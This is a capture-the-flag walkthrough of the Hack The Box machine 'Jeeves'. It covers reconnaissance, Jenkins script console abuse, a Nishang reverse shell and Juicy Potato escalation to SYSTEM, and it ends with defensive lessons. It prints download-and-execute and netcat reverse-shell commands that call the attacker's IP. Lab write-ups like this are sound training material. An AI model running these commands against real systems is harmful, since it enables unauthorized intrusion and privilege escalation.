Jeeves

Reconnaissance

First we want to run a initial nmap scan to see what ports are open and what services are on those ports.

nmap -sC -sV -oA nmap/init 10.129.174.184

-sC: run default nmap scripts
-sV: detect service version
-oA: output all formats to nmap/initial

We get back the following information:

init.nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-24T05:19:57
|_  start_date: 2022-03-24T05:08:21
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 secondshcl

Enumeration

Passive Enumeration

IIS Directory Enumeration

gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Jetty Directory Enumeration

gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Active Enumeration

Exploring IIS

Looking at the http site we are presented with a search bar

Searching takes you to error.html which turns out to just be an image

Source code for site, the action results in error.html

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
  	<input type="text" placeholder="Search here..." required>
	  <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
</form>
</body>

</html>

Exploring Jetty

Quickly checking gobuster for jetty shows that we have a directory to check out

Going there we see Jenkins!

Turns out we have command execution without needing to be logged in which works in our favor

Initial Access

Using Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box

First we want to copy the example to the bottom of the script so that it is run when copied to the machine we are attacking

Next we want to get a web server running and a netcat listener to catch the reverse shell. In this se I am using updog for my simple web server.

Using the script console again I run this command to download and execute the invoke powershell tcp reverse shell script

And we get a shell back!

This allows us to get user.txt!

Privilege Escalation

Juicy Potato

Next we want to run PowerUp.ps1 however we want to use the dev branch as it has extra checks

Then we want to run these commands in our reverse shell

IEX(New-Object Net.WebCLient).downloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # This runs the powershell function to check everything

Right away we see SeImpersonatePrivilege which means this box is vulnerable to Juicy Potato!

We first need to download JuicyPotato.exe to the box which I am hosting from my kali box

We need to copy kali's nc.exe to the windows box

# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"

Next we want to run JuicyPotato!

This is the input I used:

-t: *
-p: c:\windows\system32\cmd.exe
-a: "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001"
-l: 9001

cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *

We got nt authority\system!

When we try and take a look at the administrators desktop we see hm.txt with an interesting message

Then I tried this

Alternate Data Streams, find more about them here

We can direct this into more and get the flag

C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only first 16 bytes of hash shown

Lessons Learned

Restrict who can access the Jenkins management as this opens up unauthorized access
In some instances a file using alternate data streams could be an indicator of compromise
Be careful of which service users have SeImpersonatePrivilege as this could allow an attacker to easily escelate their privileges

PreviousWindows NextTryHackMe